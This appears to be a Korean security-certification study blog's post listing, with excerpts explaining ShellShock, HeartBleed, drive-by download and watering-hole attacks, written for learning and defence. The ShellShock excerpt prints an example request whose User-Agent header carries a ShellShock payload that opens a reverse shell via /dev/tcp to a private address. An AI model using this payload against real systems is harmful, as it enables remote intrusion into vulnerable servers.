정보보안기사&CISSP관련/침해사고 분석 및 대응12 [Day 121] GNU Bash 취약점(ShellShock) 개요 취약한 버전의 bash는 환경변수의 함수 선언문 뒤에 임의의 명령어를 삽입할 경우, 환경변수에 설정된 함수 선언 시 함수 선언의 끝을 인지하지 못하고 삽입한 명령어까지 실행하는 취약점이 있음. 이것을 GNU Bash 또는 ShellShock 취약점이라고 함 CGI를 이용한 Bash 취약점 공격유형 공격원리 CGI는 User-Agent 같은 요청 헤더정보를 쉘의 환경변수에 저장함. 공격자가 헤더정보에 함수와 명령어를 추가하여 전송하면 해당 명령어가 실행되는 취약점 발생 리버스 쉘 연결 유형 GET /cgi-bin/bash_vul.cgi HTTP1.1 User-Agent:(){ :; };/bin/bash > /dev/tcp/10.10.10,10 8081 0) 하고 있음. 즉 bash를 통해 화면으로 출.. 2020. 12. 9. [Day 120] HeartBleed(하트블리드) 취약점 HeartBleed 취약점(2014년 4월) 하트블리드 취약점은 통신구간 암호화를 위해 많이 사용하는 OpenSSL 라이브러리의 하트비트 확장 모듈의 버그로 인하여 발생한 취약점으로 서버에 저장된 중요 메모리 데이터가 노출되는 취약점 하트비트 요청 메시지 처리 시 데이터길이 검증을 하지 않아, 시스템 메모리에 저장된 64KB 크기의 데이터를 외부에서 탈취할 수 있음 SSL/TLS 서버 개인키, 세션키, 쿠키 및 개인정보(ID,PW, 이메일 주소 등)이 노출될 수 있음 하트비트(HeartBeat) 확장 모듈 OpenSSL1.0에 추가된 기능 SSL/TLS 프로토콜에서 매번 연결을 재협상 하지 않아도 상호간의 연결지속신호를 주고받으면서 연결을 지속해주는 기능클라이언트가 하트비트를 요청하면서 Payload와 .. 2020. 12. 8. [Day 115] DBD(Drive By Download) 공격 DBD(Drive By Download) 공격 취약한 PC환경의 사용자가 홈페이지에 접속할 경우 자신의 의도와 무관하게 악성코드가 다운로드되어 설치되는 공격 보통 파밍형 악성코드를 통해 금융/개인정보를 탈취하거나, 특정 타겟 대상으로 악성코드를 유포하는 워터링 홀 방식의 APT 공격이 주된 목적임 DBD공격은 일반적으로 난독화된 악성 스크립트와 다수의 경유지/중계지를 거쳐 최종 유포지로 접속하여 악성코드를 다운로드하도록 요청함. --> 추적을 어렵게 하려는 목적 관련 용어 경유 페이지(Passage Page) 또는 경유지 : 악성 스크립트가 삽입되어 있는 방문페이지 유포 페이지(Distribution Page) 또는 유포지 : 실제 익스플로잇 및 악성코드가 저장되어 있고 이를 유포하는 페이지 공격 시나리.. 2020. 12. 3. [Day 113] 워터링 홀(Watering Hole) 침해 사고 시나리오 워터링 홀(Watering Hole) 공격 기법 공격대상이 자주 방문하는 웹사이트에 악성코드를 심어놓고 공격대상이 접근하면 악성코드에 감염되는 방식 공격 시나리오 예시 1) 공격자는 타겟이 자주 가는 사이트에 타겟 IP대역으로 접근하는 사용자에 대해 악성코드 유포지로 리다이렉트하는 악성 스크립트 삽입 2) 희생자는 악성코드에 감염되고, 공격자는 백도어(리버스 쉘)을 통해 포트 스캐너, SSH클라이언트, 키로거 등 추가 공격도구 다운로드 3) 추가 공격도구로 내부 스캔하여 내부 사이트 관리자 계정 탈취 4) SSH클라이언트 프로그램을 이용하여 SSH 원격 포트 포워딩을 통해 외부에서 방화벽을 우회하여 내부 사이트 접속 성공 5) 지속적 침입을 위해 악성코드(백도어)를 시작 프로그램에 등록 2020. 12. 1. 이전 1 2 3 다음
